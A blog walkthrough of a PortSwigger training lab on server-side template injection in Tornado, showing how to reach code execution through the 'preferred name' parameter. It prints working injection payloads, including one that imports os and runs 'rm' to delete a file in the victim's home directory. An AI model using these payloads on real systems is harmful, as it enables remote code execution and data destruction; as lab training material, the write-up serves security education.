BOOK THIS SPACE FOR AD
ARTICLE ADPortswigger Lab Solution — SSTI Code Context | Karthikeyan Nagaraj
Check out the Basics of SSTI in my previous post
Lab Description:
This lab is vulnerable to server-side template injection due to the way it unsafely uses aTornado template.To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory.You can log in to your own account using the following credentials: wiener:peterAnalysis:
Login into the accountwiener:peter and post a comment.For Example, I’m inserting{{5*5}} as Comment
2. Check outMy Account, we can see that there is a Functionality called thePreferred name which may be vulnerable
3. Intercept the traffic through burp and send it to Repeater — Ctrl+r
4. Let’s try to Inject Tornado’s Template Expressions.
The Below Syntax is used for Tornado
{{someExpression}}5. Let’s test whether the Expression is Executing or Not by Sending the below payload into the parameterblog-post-author-display
}}{%25+import+os+%25}{{+"+Working"Reload the Page. Make sure to turn Off the proxy or the Intercept Off
It’s Working : )
Some of the Payloads
{{7*7}} = 49
${7*7} = ${7*7}
{{foobar}} = Error
{{7*’7'}} = 7777777
6. As we know the syntax of Tornado’s Template and we also know that the expressions are Executing, So Let’s use the python code as a payload to deletemorale.txt
}}{%25+import+os+%25}{{os.system('rm%20/home/carlos/morale.txt')Feel Free to Ask Queries via LinkedIn and to Buy me a Cofee : )
Thank you for Reading!!
Happy Hunting ~
Author: Karthikeyan Nagaraj ~ Cyberw1ngportswigger , ssti , bug bounty , tornado , injection , karthikeyan nagaraj ,cyber w1ng , python